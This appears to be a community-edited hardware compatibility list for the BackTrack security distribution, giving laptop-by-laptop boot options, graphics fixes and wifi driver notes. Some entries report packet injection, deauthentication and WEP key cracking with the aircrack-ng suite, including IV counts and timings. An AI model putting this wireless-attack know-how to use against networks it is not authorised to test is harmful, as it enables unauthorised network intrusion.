– Change VESA driver to i810, and add 1280×768 to the front of the resolution list

AV3250HX-01

* Works just fine using DVD ISO, boots to bash.
* Special xorg.conf required for Via / S3 Unichrome display to use GUI interfaces flux and KDE.

– Error message: (EE) (*)Screens found, none with usable configuration.
– VIA, S3, Unichrome, xorx.conf
– jerror

Aristo


Aristo Smart 250D

Runs fine with no extra parameters.

* No problem with booting
* IPW2200 can enter monitor mode
* IPW2200
* Packet Injection with IPW2200 is possible

Dell


Inspiron
Inspiron 910 (Mini 9)

* xconf and startx run great up to 800×600 resolution. No additional configuration needed.
* Does not work for injection with the stock Broadcom WiFi Card.

Inspiron 1000

* Runs fine with no extra parameters.

Inspiron 1100

* Loads in 640*480 can’t make any larger on mine
* Sometimes gets the IO 104 error
* “IO error 104”. Just run: rm -f /etc/X11/xorg.conf
* Belkin f5d7010v7 and Hawking hwc54g didn’t detect
* startx command failed due to inconfigurable monitor
* IMPORTANT UPDATE for this model: Load latest BIOS firmware of A32, then set Video memory from 1 to 8 MB in BIOS. X will now run XGA and fill then entire screen. The best Linux distro to run on this Dell Inspiron.

Inspiron 1150

* Runs fairly well, needs to detect graphics before launching GUI

I have found that just removing the X11 config file allows my 1150 to get past the “IO error 104”. Just run: rm -f /etc/X11/xorg.conf
Inspiron 1420

* Tested with 128MB nVidia 8400GM S Video Card. Works great. Use xconf before using startx and you are all set.
* This model came with an Intel PRO Wireless 3945abg WiFi Card. Great for injection with the IPWRAW drivers.

Inspiron 1501

* Runs fine with no extra parameters.
* Had to remove vga from boot parameters. Turned off acpi (acpi=off), otherwise hangs during boot up process.

Inspiron 1521

* Seems to fail when looking for floppy device. BT3: Select VESA KDE, hit Tab, append “bt irqpoll acpi=off” (without quotes), hit Enter to continue.

Inspiron 600m

* Runs fine with no extra parameters

Inspiron 510m

* Runs fairly well, needs to detect graphics before launching GUI

–> Needs command before launching GUI: xconf
Inspiron E1505 / 6400

* Runs fine with no extra parameters.
* Dell 1350 works, not sure about injection.
* Works very slow, about 10000 IV’s per hour.

Inspiron E1705 / 9400

* Runs fine with “slax nopcmcia” command appended due to lack of PCMCIA slot on machine
* Core 2 Duo works like a charm
* Needs NISWrapper for Broadcom BCMWL5.INF

Inspiron 1300

* Needs command: “bt acpi=off” – otherwise, gets a blackscreen.
* Wifi didnt even work for me ! big problem.
* My B130 loads fine with the above mentioned “bt acpi=off”
* WIFI is Broadcom 43xx will monitor but not inject (unstable power yada yada)

Inspiron 2200

* Seems to run fine
* Some problems with wifi

Inspiron 4100

* Seems to run fine
* Even the wifi networking was working
* Does not support the 1600×1200 display in the NV G2Go

Inspiron 5150

* Seems to run fine

Inspiron 6000

* Runs fine with no extra parameters.
* no matching wifi drivers? wifi fine from pcmica. ?? Wifi works for me
* X runs at 1024×768 by default, get the ATI drivers to fix
* Intel Graphics works with 1280×800

Inspiron 8100

* Runs fine with no extra parameters.

Inspiron 8200

* Runs fine with no extra parameters.

Inspiron 9100

* Runs fine with no extra parameters.

Inspiron 9200

* Runs fine with no extra parameters.

Inspiron 9400

* First tests indicate that it runs fine with no extra parameters. Load 3945 has to be used before the built-in wireless interface can be used (the wireless interface seems to appears as eth1). Note: the wireless interface will only be detected if it’s not disabled via the “hardware switch” (Fn+F2). The WiFi indicator light will flash when the wireless interface is enabled (unlike the behaviour under Windows, where it is steadily lit when WiFi is enabled). It may be additionally required to start the interface via ifconfig eth1 up.

Inspiron XPS Gen 1

* Works with this laptop.
* did not get deAuth to work; injection might not work on (BCM 4320) or deAuth might not work because I’m a NOOB.

Inspiron XPS Gen 2

* Works perfectly with this laptop.
* No extra parameters needed.

Inspiron 6400

Works good with ipw3945 drivers I load BT from USB flash drive and all is O.K.

does not autodetect wireless interface
Inspiron 630m

* Needs command: “bt acpi=off” – otherwise, gets a blackscreen

i got blackscreen also with this command…and i had windows xp boot failure after reboot
Inspiron 640m

Does not run fine

* Small problem with booting I mean not detecting bluetooth device (Dell TrueMobile 355 Bluetooth 2.0 + EDR module)
* Monitoring mode all right but no packet injection is possible

Latitude
Latitude CPI xx

* CPI A400XT works fine with boot option : bt irqpoll

Latitude C600

* Seems to work perfectly with no extra parameters or configuration, never had any problems with any Linux Distro but i have never tried to use the infrared, serial, com or dock ports.
* I have been having trouble getting it to boot; I get a freeze at the “starting USB support…” line. I am re-burning the iso as a test. Will update. Edit: Yay it works with “bt irqpoll”! Also, hard drive install works.

Latitude D420

* Works perfectly with ipw3945 drivers

Latitude D505

* Should make use of the “A09” BIOS rev. while running a LINUX environment. Although there actually are other (newly updated) versions alike the “A11” BIOS. Other BIOS versions rather than “A09”, that is available at DELL:s homepage for download, seems to be incompatible with the X server-driver further known as “I810”.
* –Update–: xconf will test + setup the xorg server to work with i810. I have not tried running x with 1MB shared memory but instead 8MB which works great.
* For those who want to get the built-in modem working:

Do lspci -n| grep 8086:24c6

*
o If you see it listed then you are in luck, the driver you would need is Linuxant HSF modem driver. The usage of the driver is free but limited to 14.4k however if you pay for license you can utilize it fully.
o For those that do not have any details of it returned to them, you will need to download this: http://132.68.73.235/linmodems/packages/scanModem.gz and run it as root.

Latitude D510

* Boots Live and installs on hard drive perfectly (also dual and multi boot -MacOS, Vista, XP, BT).
* Works good with ipw2200 drivers.
* ONLY Aireplay-ng [“–interactive”,”–arpreplay”,”–chopchop”] options work, due to an ipw2200 limitation. Nevertheless Wep and Wpa cracking are posible in little time with those little injection options. See ip2200.

Latitude D520

* Works perfectly with ipw3945 drivers
* Runs on Centrino Duo with no extra parameters.

Latitude D531

* Boots Live and installs on hard drive perfectly (also dual boot -XP, BT).
* In order to use the D531 : Boot from the CD, Highlight “BT3 Text Mode Frame Buffer”, Press Tab, add -> nolapic, press enter, Log in with root and toor, startx .

Latitude D600

* Doesn’t run fine, tested with 2 D600 –> startx fails

BT2 final: startx works fine on my D600

Work Fine on my Latitude D600 BT2 final boot on USB

* D600 Rev.A04: Everything works without modification (including startx, wireless, ethernet).
* Try running xconf before startx and it works beautifully. –got that tip form the login page, also in /etc/issue

;)

Latitude D610

* Runs fine with no extra parameters.
* Runs fine installed on the hard drive without any extra parameters.

Latitude D620

* Runs fine with no extra parameters.
* Intel 945GM chipset needs the new xserver-xorg-video-intel driver to run Xorg at higher resolutions.

Latitude D810

* Runs fine with no extra parameters.

Latitude D820

* Runs fine with no extra parameters.
* Runs on CORE2 with no extra parameters.
* lspci output
* for the version with the nvidia card and wuxga screen, the nvidia binary driver is necessary to get a proper resolution in X
* acpi needs additional scripts for LID Close = LCD Backlight off to work.

Latitude D830

(BT3)Boots completely without issue or extra parameters.
Latitude L400

* Doesn’t run fine with BIOS A09. ACPI doesn’t work. Fan doesn’t start and laptop overheats. Runs fine with APM using acpi=off.
* ACPI runs fine with BIOS A03. Suspend works using acpi_sleep=s5_bios.
* Freezes during boot on “Starting Usb…”

Latitude X1

* Runs fine with no extra parameters.

Needs 915resolution to get 1280×768
Latitude C640

* Runs fine with no extra parameters.
* Ralf Falco Leyva,Germany

Latitude C610

* CD Boot freezes when it reaches “Starting USB support”
* BT2 works flawlessly (so far) on board ETH0 drivers loaded at boot time.
* Sound and gfx perfect.
* USB Bluetooth dongle or memory stick found at boot up.

Latitude 120L

* Runs fine with bt acpi=off from livecd.

Latitude 110L

* Ran fine with livecd – installing to HD was nightmare, but got done and works.

XPS
XPS M1210

* Works perfectly with ipw3945 drivers
* Download video drivers from Nvidia for 1280×800

XPS M1330

* Geforce 8400m GS (Assembly Mod)
* 01:00.0 VGA compatible controller: nVidia Corporation GeForce 8400M GS (rev a1)
* 0c:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02)
* BT3 Final Works Perfectly
* BT3 No sound,refer to http://intr.overt.org/blog/?page_id=56

XPS M1530

* Geforce 8600m GT (Assembly Mod)
* BT3 beta Works perfectly, No extra parameters needed.
* BT3 Final release has numerous problems with this laptop.

XPS M140

* Works with “bt acpi=off”, otherwise screen goes black on loading kernel

Others
Precision M65

* WIFI works with ipw3945 drivers
* Xorg looks better with nvidia drivers (1920×1200)

Vostro 1500

* cd worked fine with no extra parameters
* needs ipw2345 driver
* am working HDD insatll dual boot with vista

ECS


Model GREEN220

* runs fine with live CD at 1280×800 using “xconf”

Everex


Stepnote SA

* Doesn’t finish booting, freezes with this error: sdhci:slot0: unknown controller version (16)
* If anybody has a solution for this… Please post…

philips freevents x55 i have same error message on core2duo based philips freevents laptop. does any one know the solution….
StepNote XT5000T

* Runs fine with no extra parameters.
* OS and tools work with wireless hardware with no extra configuration.

Fujitsu Siemens


Lifebook
Lifebook A-3130
BT2

* Needed “bt acpi=off” to boot.
* Wireless, PCMCIA, and NIC are detected fine.
* Run xconf to config graphics and then startx to get all screen resolutions.

BT3

* Needed “acpi=off” to boot
* Wireless, PCMCIA, and NIC are detected fine.

Lifebook B-2630

* Needs to be installed on harddrive but runs fine. X is also nice.
* Touchscreen not yet verified.

Lifebook C-1110

* Runs fine with no extra parameters
* Intel IPW2200 has to be enabled with “ifconfig eth1 up”
* kismet and airodump are working fine
* X runs in 1024×768 at 85 Hz

Lifebook E-4010

* Runs fine with no extra parameters. X is also nice.
* Onboard NIC (Realtek) and WLAN NIC (Intel) both are detected correctly
* The PCMCIA bus is enabled nicely as well
* The only thing to get X to work, is rerun the xorgsetup(graphical)/xorgconfig(text).

* I just press enter all the way through the config (accepting defaults).
* The only thing I choose other than default is the keyboard (I select PC-104 keys).

* Some strange reason it doesnt like the pre-configured settings.

Lifebook E-6560

* Runs fine with no extra parameters. X is also nice.

Lifebook P-5020

* Runs fine with no extra parameters. X is also nice

Lifebook P-7010

* X runs in 1024×768, WS Laptop
* Wifi (Intel 2200BG) is fine

Lifebook T-4010

* X runs great if you configure it first…otherwise you will have some issues.
* Wifi (Intel 2200BG) runs like a champ.

Amilo
Amilo Xi1526

* Runs without any problems…
* WiFi needs ipw3945 module
* X runs in 1024×768 / needs NVIDIA driver for 1440×900

Amilo M 7405

* Runs without any problems…

Amilo Xi1554

* Runs without any problems
* Install Wifi using Wifi installation guide
* Ati X1900 drivers install using ati driver
* After this X will run in 1920×1200


Gateway


CX320X-CTO

* realtek wired ethernet
* ipw2200 intel pro g wireless, Backtrack has driver & firmware
* intel 855 gfx
* USB works
* Firewire: unknown
* sound works, play with alsamixer to get things going. specifically, turn off “External Amplifier” to get sound through speakers

CX210S

* Runs fine with no extra parameters.
* Uses IPW3945 wireless drivers.

M275

* Runs fine with no extra parameters.
* Touchscreen not yet verified.

MX6025

* Fine with no extra parameters
* Built-in MiniPCI Wifi card is a Broadcom/Gemtek WMIB-160GW.

MX6453

* Works well in Backtrack 3 except sound slider doesn’t change volume.
* Built-in MiniPCI Wifi card is Broadcom <– RTL8187.

MX6625

* Use bt acpi=off at the boot prompt
* To get card services working also add: irqpoll pnpbios=off pci=usepirqmask pci=biosirq

MX6920

* Fine with no extra parameters

MX6926b

* Add “irqpoll” to command line arguments at boot. This can solve multiple problems such as 1) freezing at “Looking for data directory” 2) Inability to load pentest.lzm 3) Inability to load var.lzm. However, these problems are temperamental, in that they sometimes dont happen, and sometimes do.

MX6927

* use “bt irqpoll”, otherwise boot stops at “looking for data directory”

MX6428

* Fine with no extra perameters
* Built-in wifi is broadcom **CAUTION** use external

or switch out for miniPCI atheros !

MX6930

* Seems to hang at ‘Looking for Data Directory’. On BT3: Select VESA KDE, hit tab, append “bt irqpoll acpi=off” (without the quotes), hit Enter to continue.

7422GX

* Fine with no extra parameters
* Built-in Wi-Fi is Broadcom. Works fine.

MX7515

* use “bt irqpoll” if shows no PCI interrupts & disabling cardbus in dmesg (e.g. using ubiquiti SRC card)
* Built-in Wi-Fi is Broadcom BCM4318.

MX8738

* Fine with no extra paremeters
* Built-in Wi-Fi is Broadcom. Works perfectly. Packet injection works!

:D

Solo 5300

* use “bt irqpoll”, otherwise boot stops at “looking for data directory”

NX570X

* use “bt irqpoll” the runs fine

Gericom


1st Supersonic

* Runs fine without extra parameters.
* PCMCIA 22MBit Wireless Card with TI-Chipset requires to load the acx Module but works fine.

Hummer FX 5600

* Runs fine without extra parameters.
* Do not run ´xconf´, just do ´startx´

HP/Compaq


Armada
Armada 1750

* Runs fine with no extra parameters.

Runs fine, but, sound device didnt get recongnised.

:(

Had to start LiveCd with boot option “bt noirqpoll” in order to pass the “Starting USB support” boot step. That step takes a while though … (This is an upgraded Armada 1750 with PIII 500Mhz and 128Mb RAM)
Armada 6500

* erm eth0 up =chash ..56kmodem/10/100net combo .

Armada E500

* Runs fine with no extra parameters.

Armada M700

* Runs fine with no extra parameters.
* Various problems inducing a Kernel Panic.Will work on it:-). -ralf.falco@online.de

Disputed. Works great on my M700. AM7 P3700T4X12VC64N2. -fearnodelusion@gmail.com

* Runs also fine on my M700 (850 Mhz – 256 Mb) with no extra parameters.

(Wifi Senao Card PRISM recognized as Orinoco but switch to hostap is OK – injection is perfect) (Belkin 54G WIFI also detected OK – injection not tested)
Evo
Evo N160

* The CD/DVD version runs fine with no extra parameters.
* The USB version will not work, because this laptop cannot boot from a USB device. I tried 2 different USB flash sticks, both of which boot fine on other PC’s. I haven’t checked for any BIOS upgrades which may allow this, though.

Spec of laptop tested: CompaQ EVO N160, P3 “Tualatin” 1Ghz (512K cache), 384MB RAM, 15GB HD, DVD-ROM, 1024×768 XGA TFT, ATI Radeon 8MB video card.
Evo N410c

* Runs fine with no extra parameters.

Confirmed working AOK no boot time parameters needed. Note: I don’t own the docking station for this laptop so I don’t have CD or Floppy. But BT2 booted and installed to HD fine from usb flash drive.

* Will not Boot from USB Drive Just locks up.

Evo N600c

* Runs fine with no extra parameters.

Evo N610c

* Runs fine with no extra parameters.

Evo N620c

* Runs fine with no extra parameters.

nc
nc4200

* Runs fine but only if connect external CD Rom drive to usb port at the back of the laptop.

nc6000

* Runs fine with no extra parameters.

nc6120

* Runs fine with no extra parameters.
* lspci output

nc6220

* Runs fine with no extra parameters.

nc6230

* Runs fine with no extra parameters.
* iwp3945 module has to be loaded

nc8430

* Runs fine with no extra parameters. (Internal-NIC and ipw3945)
* Use IPWRAW drivers for injection capabilities
* Test with Netgear WG511T comming later…

nx
nx6110

* Runs fine with no extra parameters.
* lspci output

nx6310

* Runs fine with no extra parameters.
* iwp3945 module has to be loaded

ipw3945 wireless

* integrated bluetooth turn has to be turned on by hciconfig hci0 up

wireless and bluetooth must be turned on before booting backtrack

and also the dual core probably needs to recompile the kernel to use both cpus
nx6315

* Runs fine with no extra parameters.
* Need to recompile kernel to support SMP kernel

Processor : AMD Turion 64-X2
VGA : ATI Radeon Xpress 1150
Sound : Analog Devices
Network : Broadcom 440x 10/100 Integrated Controller
Broadcom 43xx 802.11b/g WLAN (mini PCIe)
1394 Firewire

nx6325

* Runs fine with no extra parameters.
* Optional Video: ATI Drivers from ATI Website (You’ll have to recompile the kernel without the radeon-driver before installing the proprietary driver)

nx7400

* Runs fine with no extra parameters.
* Runs on Centrino Duo with no extra parameters.
* ipw3945 wireless NO PACKET INJECTION SUPPORT!

nx8220

* Runs fine with no extra parameters (ipw2200)

nx9020

* Runs fine with no extra parameters.

nx9420

* Boots ok without extra parameters
* One CPU seen, kernel must be recompiled for dual core
* For 1680×1050 must download Atis drivers
* Bluetooth and ipw3945 work natively (wireless button little buggy)

nw
nw9440

* boots fine including enhanced SATA
* only one CPU seen on Core 2 Duo T7200 and runs at 100% usage (klaptop cpu throttle??)
* 17″ widescreen, 1920×1200 via download/install of nvidia drivers from src
* ipw3945 wireless

Pavilion
Pavilion dv5100 OC

* Starts fine with no extra parameters.
* The dreaded bcm4318 will monitor but not inject.
* xconf results in lockup (so max resolution is only 1280X768).
* Kismet randomly crashes.
* bcm4318 must be restarted if you try and open kismet again after it has been closed.
* Touchpad FREAKS out/becomes useless when Kismet and a few other programs are opened. It occasionally fixes itself after all programs are closed, but usually requires holding power button for a reboot.

Pavilion dv5215us

* Runs fine with no extra parameters.

Pavilion dv1664ea

* Does not detect the onboard ethernet/ or Wireless Card
* Other wise runs smooth

Pavilion dv2222la

* Does not detect the onboard ethernet (Intel PRO/100 VE)
* Wireless card work fine after loading ipw3945 drivers
* Other wise runs smooth
* Not true. Wireless doesn’t work at all. Even after loading the driver. Shame what a Shame.

Pavilion dv2098ea

* Does not detect the onboard ethernet/ or Wireless Card
* Other wise runs smooth

Pavilion dv2104eu

* Runs fine with no extra parameters.
* Admits parameter bt dbt

Pavilion dv2275ea

Backtrack 3 (beta), not tested with BT2…

* Detects onboard Wireless Card but that’s as far as it go’s!
* Runs fine with Ralink RT73 USB Wireless Card (+ driver provisos)
* RJ45/UTP works well and transfers small and large files across LAN

Pavilion DV6000

* Seems to need the Boot parameter: bt acpi=off
* Video Intel Corporation Mobile 945GM/GMS/940GML
* lspci output
* Video Nvidia Go6150 Works Perfect
* Had problems getting the WiFi to work

Pavilion DV6152

* Boots and runs fine
* Lack of Bluetooth adapter support
* Video Nvidia Go7200 Works fine

Pavillion DV6226

* Needs command: “bt acpi=off” – otherwise, gets a blackscreen

Pavillion DV6236

* Working…no extra parameters needed

Pavilion DV6604NR

* Needs boot options “acpi=off nopaic”
* Wireless card needs Ndiswrapper.
* I had to install Nvidia drivers from the official site, you may not have to.
* Everything else seems to work great.

Pavillion dv6737ez

* Works fine.

Pavilion DV9000

* Runs fine live, resolution limited to 1024×768 (nVidia GeForce Go 6150… can’t get the driver working, probably just fail at xorg.conf editing

:)

Also, uses the dreaded BCM4311… I just use a USB dongle for wireless.

Pavillion DV9702ea

* Runs fine (Inc. packet injection) but hangs on fdd detection if not on AC power

Pavillion ZE4935

* Installs rough. Used a manual install manual, other than that works just fine, WiFi driver problems

HP Pavilion ZV6170us/ca

* Runs fine with no extra parameters
* run xconf to get 1280×800 resolution … working on installing ati drivers
* lspci output

HP Pavilion ZV6195

* Seems to require : acpi=off

HP Pavilion ZV6068EA

* This laptop is a part of HP Pavilion ZV6000 series (Production year 2005)
* Up and running flawlessly with BT2 LiveCD and HD installation
* FYI, WLAN Card is a Broadcom BCM4306
* FYI, Ethernet LAN Card is a Realtek

HP Pavilion dv8218ea

* all works fine from CD, but if you do xconf=640resolution, if not=1024 with a 85refresh rate.

HP Pavilion (TX1220US)

* Works perfectly out of the box. All hardware is recognized perfectly. Tablet *screen works with BackTrack as well! However the webcam biometrics scanner do nch sot work. And the touch screen is not calibrated.

HP Pavilion TX2120us

* OS runs fine on live CD, but the Broadcom 4321AG network adapter does not work.
* Touch Screen does not work.

HP Pavilion TX2510us

* Boots, but promptly shuts down with “overheat” message. Setting acpi=off causes computer not to boot.

HP Pavilion TX2513cl

* Boots, shuts down with overheat message. Updating BIOS from HP’s website resolves acpi issues with this model.
* HP OS selection page for this model

HP Pavilion TX2550er

Try with usb:

* Boots, but shuts down with “overheat” message. Setting acpi=off causes computer not to boot.
* In fail-safe mode acpi=off nolapic stop with lines:

linux live end, starting the Linux distribution.
Usage: init 0123456SsQqAaBBCcUu

Presario
Presario F700-F768WM

* Runs great, needs acpi=off option.

Presario R4000

* Runs fine, but may need to add the acpi=off option.

Presario 1400

* Runs fine with no extra parameters.

Presario 2100

* Runs fine with no extra parameters.

Presario V2405

* Runs fine with no extra parameters
* run xconf to get better resolution
* Default Wireless card Broadcom B/G does not work however

Presario V2570n

* Runs fine with no extra parameters.
* Default Wireless card configures automatically and connects very quickly.

Presario V4000

* Does not detect widescreen resolution (1280×768, 1280×800 or 1400×1050) and stretches pixels, otherwise Runs fine.

Presario V6410TU

* As problem while booting. Worked with acpi=off option while booting.
* Built in Broadcom Wifi card is detected but doesnot works.

Others
Compaq tc1100

* Had problems using integrated card and wlan assistant 0.5.7 (for WPA)
* Touch screen/pen doesnt work out of the box
* Graphics card has slow/minor flicker, tried to correct but no success
* Rest of machine works fine

HDX 9000

* (Equipped with ATI Mobility Radeon HD 2600 XT card)

Cannot boot into X windows in BT 3 – Beta. Gives error Vesa(0): No Matching Modes (EE) Screens found,
but none have a usable configruation. Fatal Error- No screens found giving up
XINIT- Connection reset by peer (errno 104)-Unable to connect to X Server

* This model boots fine into BT 2 without the screen error above.

HP 510

* Touchpad needs additional drivers.
* Wired ethernet doesnt work at the same time as Wifi.

HP 530

* Runs fine with no extra parameters.

HP G5000

* compiz works fine just wait till you see the compiz icon on the tray.

s0u][ight
Omnibook 6100

* Runs fine with no extra parameters.

Omnibook XE3

* Runs BT3 fine in VESA graphics mode, standard graphics mode forces 800×600 video.

IBM


Thinkpad A21m

* Runs fine with no extra parameters.

Thinkpad 600

* Runs fine with no extra parameters.

Thinkpad 600E

* Disable ACPI for USB to work(Edit lilo.conf)
* Sound issues, still not solved. Looping error

R30

* Runs with “bt irqpoll”

R31

* Runs with “bt irqpoll”

T22

* Runs fine with no extra parameters.
* Do not run Xconfig or display looks bad.

T23

* Runs fine with no extra parameters.
* lspci output

T30

* Runs fine with no extra parameters
* Idealy modprobe ibm_acpi and modprobe speedstep_ich

T40

* Runs fine with no extra parameters.

T41

* Video : radeon drivers via xconf
* lspci output

T42

* Runs perfectly with no changes
* Run xconf to get SXGA resolution in X

T43

* Runs perfectly with no changes
* lspci output

T60

* Video: ATI Drivers from ATI Website
* lspci output

T60p

* Runs fine with no extra parameters
* Started KDE via ati command.

T61p

* Runs fine in VESA mode.
* Needs the closed source Nvidia driver if you have the Nvidia 570M.
* lspci output

R50e

* Runs perfectly with no changes

X20

* Runs fine with no extra parameters

X23

* Runs fine with no extra parameters

X30

* Runs fine with no extra parameters
* lspci output

X31

* Runs fine with no extra parameters
* lspci output

X40

* Runs fine with no extra parameters
* lspci output

Z61m

* Video: ATI Drivers from ATI Website

R40

* Runs fine with no extra parameters.

Lenovo 3000 N200

* wireless card (ipw3945) Seemingly random patterns of disconnection, sometimes takes many tries to connect using wireless assistant
* Soundcard detected by ALSA but not working (Intel HDA RealTek card)

Lenovo R60

* Runs fine with no extra parameters.

Lenovo R61

* Runs fine with no extra parameters including hdd install.

* R61:Intel 965GM-X3100 Media Accelerator-

* No sound card detected

* Only works in VESA graphics mode

* Blank screen when X server is restarted or when system brought back to runlevel 3 after X server has been loaded

Lenovo Z61

* Runs fine with no extra parameters including hdd install.

Itronix


Go Book ix250

* BT2FINAL: Runs at 640×480 with xconf (tested with 256mb RAM). Touchscreen needs tweaking, as per usual.

Maxdata


PRO 7000X

* Runs fine with no extra parameters

Medion


MD 95694

– Tested with BT2final 06.03.2007

* Sound : OK (Realtek ALC260) (KMix = OK)
* ACPI : OK (battery,charging) (KLaptop = OK)
* Display : OK (Intel 915GM Chipset) @ 1024×768
* PCMCIA : Needs the “irqpoll” kernel option at the boot to support cardbus cards (tested with D-Link DWL-G650 rev. C3).

E.g. “bt irqpoll”

– Works beautiful on BT3 FINAL (live CD) 08.2008

* except for the internal wifi card winbond W89C33 mPCI 802.11 (don’t work) :

link 1 link 2 (fr)
MD 96400

Works beautiful… tested with BT2 (live CD) Jul 12, 2007
SIM 2000

runs fine in standard configuration with live CD at 1280×800 using “xconf” Tested with BT2 FINAL

Olidata


Theom CW 1300

* runs fine in standard configuration with live CD at 1280×800 using “xconf”


Packard-Bell


Easynote w7200

* Runs fine with no extra parameters,after installing nvidia drivers set up resolution.

Easynote MZ35-V-065

Build-in Atheros chipset. !!!works great whith Aireplay. You need with the latest version 0.9.1, 52.000 ivs to crack a 128 bit wep key. Aircrack took about 1/2 sec to crack the key. (Insert Modulle for sound on this laptop.)

Panasonic


Toughbook CF-29

* Runs fine with no extra params or drivers required

Toughbook CF-28

P3-1000/512ram

* Use XConf to prevent black screen on startup (video config)
* using Atheros 802.11 A/B/G Wireless(newest version)had to use wireless assistant to use it,not kwifimanager

Toughbook CF-M34

P3-400/192M ram Runs sweet on this tiny toughbook, with following params or exeptions:

* Edit XF86.config to force the display to run at 800×600, else it tries to run at 1024×768
* For some odd reason `startx` starts fluxbox instead of KDE on this machine, the workaround is to type `xdm` at the login screen.
* Sound works with no further configuration.
* Modem doesn`t work, but its a winmodem! (apparently there is a driver available though.)
* Trying to compile apps from source results in a segmentation fault, and appears to be hardware related, though I have yet to narrow it down. The solution for now, is to compile on a similar machine running Backtrack, or Slax, (I had to do this to upgrade Aircrack-ng) and transfer the files over before doing make install, but have a look on the Slax homepage, and see if the app you want is there as a module.


Philips freevents


x55

* core 2 duo laptop.
* bt hangs up during boot with message
* error: sdhci:slot0: unknown controller version (16)
* fans doesn’t start, so the compuret overheats after a few minuits

This can be solved by starting with “bt nohotplug acpi=off”, but I haven’t got X working yet. Also it doesn’t detect any network controller. They list with lspci, but you get an error telling you it doesn’t exist when you try to load the wifi-drivers. The whole problem is due to a very rare edition of the builtin ethernet-card (8139too). You have to somehow recompile the kernel, and make sure to activate:

* CONFIG_8139TOO_PIO=y
* CONFIG_8139_OLD_RX_RESET=y

SAMSUNG


Q30

* BT2final 06.03.2007 runs fine with sound and packet injection for Intel 2200BG out of the box

X20

* BT2final 07.03.2007 Recognizes Intel 2200BG while booting, but has error messages. WLAN card is not recognized in the booted system. Fixed problem with command: rmmod ipw2200

modprobe ipw2200 rtap_iface=1
R65

* BT2final 27.09.2007 runs fine. Intel ipw 3945 works after loading the module. 1400×1050 resolution works after installing the nvidia drivers from the nvidia homepage

NC10

* Tested with BT3 Final runs great
* Atheros based WLAN adapter – again, no problems. Tested monitor mode – OK; require packet injection testing
* X runs fine in VESA VGA mode, have not tested running in other resolutions (native is 1024×600) although I have read that it is possible

Sony


Vaio SZ-1 VP

* Runs fine with no extra parameters.
* Runs on CORE2 with no extra parameters.
* Video Intel Corporation Mobile 945GM –> perfect
* Video NVidia Geforce 7400 Go –> ! screen resolution can’t be changed (640×480) !

Vaio SZ-2 VP

* Very good, same as SZ-1 VP

Vaio VGN-S1XP

* Works perfectly

Vaio VGN-FE21M

* Runs fine with no extra parameters.
* Runs on CORE2 with no extra parameters.
* Video Intel Corporation Mobile 945GM –> perfect
* Video NVidia Geforce 7600 Go –> ! screen resolution can’t be changed (1024×768) !

Vaio VGN-FE11H

* Runs fine with no extra parameters.
* Runs on CORE2 with no extra parameters.
* Video Intel Corporation Mobile 945GM –> perfect
* Video NVidia Geforce 7600 Go –> ! screen resolution can’t be changed (1024×768) !

Vaio VGN-FS980

* Runs fine with no extra parameters.
* Video Intel Corporation Mobile 915GM –> perfect
* Need to run xconf to achieve native resolution (1280×800)

Vaio PCG-FX340

* Works perfectly although an edit of xorg.conf is required.

Vaio VGN-S360

* Runs fine with no extra parameters.
* Video ATI 9700 Mobility –> perfect
* Need to run xconf to achieve native resolution (1280×800)

Vaio VGN-TX651/750P

* Runs fine with no extra parameters.
* Mobile Intel(R) 915GM/GMS,910GML Express Chipset Family —> perfect
* Run xconf first to get better than 1024×768 resolution

Targa (Lidl)


Traveller 856WA MT34

* for Mobility Radeon™ X700 ATI® – RAM GDDR3 128 Mo

it’s ok after install this driver : http://ati.amd.com/support/drivers/linux/linux-radeon.html

with BT2, the internal wifi card and bluetooth not recognized on my TARGA Traveller 856WA MT34

Toshiba


Equium
Equium A100

* model A100-147
* Runs with no extra parameters.

Equium A60

* model EA60-157
* Does not detect pcmcia controller.

Portege
Toshiba Portege 7000CT

* Need to run on automatic resolution.
* Boot prompt comes up for about 2 minutes.
* KDE resolution isn’t the best
* Really old machine.

Portege 4010

* works great no extra parameters
* suspend ever works

:)

Portege M400

* Boots & loads KDE OK with no extra parameters
* did not test wifi, touchscreen, or most other things

Portege M400-EZ5031

* Boots and loads KDE with no extra parameters
* The default wifi module does not work. Run the following two commands fixes the issue.
* modprobe -r iwl3945
* modprobe ipwraw

Satellite
Satellite A45-S150

– LCD works fine @ 1024×768.
– KB works fine.
– Alps touchpad is good. No scroll support. No worries.
– Sound is fine.
– CDROM is fine. BT3 boots quickly.
– This laptop does not support booting from USB.
– USB automount/safely remove works fine.
– Ethernet card works fine.
– AR5001X+ wifi card goes into mode Monitor fine with “airmon-ng start wifi0”. Captures with “airodump-ng ath1”. Haven’t tested injection yet. Can not get Kismet to fire up with this card. Will try to research further.
– Can not boot BT3 BETA with Senao SL-2511CD PLUS card inserted. BT2 has no problems with this card.
Satellite A100-811

* Core 2 Duo T5600

Satellite A100-VA1

* Run with “nopcmcia”

Satellite A105-S2236

– BT2 did NOT work on this laptop.
– BT3 works fine with no kernel options.
– Injection works with internal wifi. With the aircrack-ng suite, I was able to obtain the WEP key on my AP.
– KDE and Flux both run fine
– USB keyboard and mouse work fine, as do USB flash drives.
– screen resolution is fine
– BT3 loads fast, as do all applications. Kismet does not work at this time.
– at this time, sound, touchpad, keyboard, and internal ethernet are all untested, I’ll do that later.

-Hex 06-Apr-2008
Satellite A105-S4034

* Run with “bt irqpoll” to make ipw3945 work

Satellite A105-S4094

* Run with “bt irqpoll” to make ipw3945 work,.
* Video runs at 1280×800, and everything else works fine.
* Modem is a winmodem, so it’s junk.

:(

Satellite A135-S2276

* These notes are BT3 Beta Specific
* Runs fantastic under BT3 Beta. You only need to update the ALSA sound drivers to get your sound working by pasting the following in a shell window then rebooting.

wget ftp://ftp.alsa-project.org/pub/driver/alsa…-1.0.15.tar.bz2
tar xvpjf alsa-driver-1.0.15.tar.bz2
cd alsa-driver-1.0.15
./configure –with-cards=hda-intel
make
sudo make install

-=Xploitz=- 23:05, 10 January 2008 (EST)
Satellite A135-S2356

* Runs fine with no extra parameters.
* Video resolution might improve with ati module (haven’t tried it yet)
* Grabs IPs for all devices at boot.

Satellite A135-S4527

* Note: These Notes Are BT3 Specific!
* Works out of the box except with sound. (Fixed with Kernel Update)
* When Updating/Recompiling kernel DISABLE “Enhanced IDE/MFM/RLL disk/cdrom/tape/floppy support” and make sure “Intel PATA MPIIX support” is ENABLED.
* Injection is supported, but as a reminder, to change to monitor mode:

ifconfig ath0 down
wlanconfig ath0 destroy
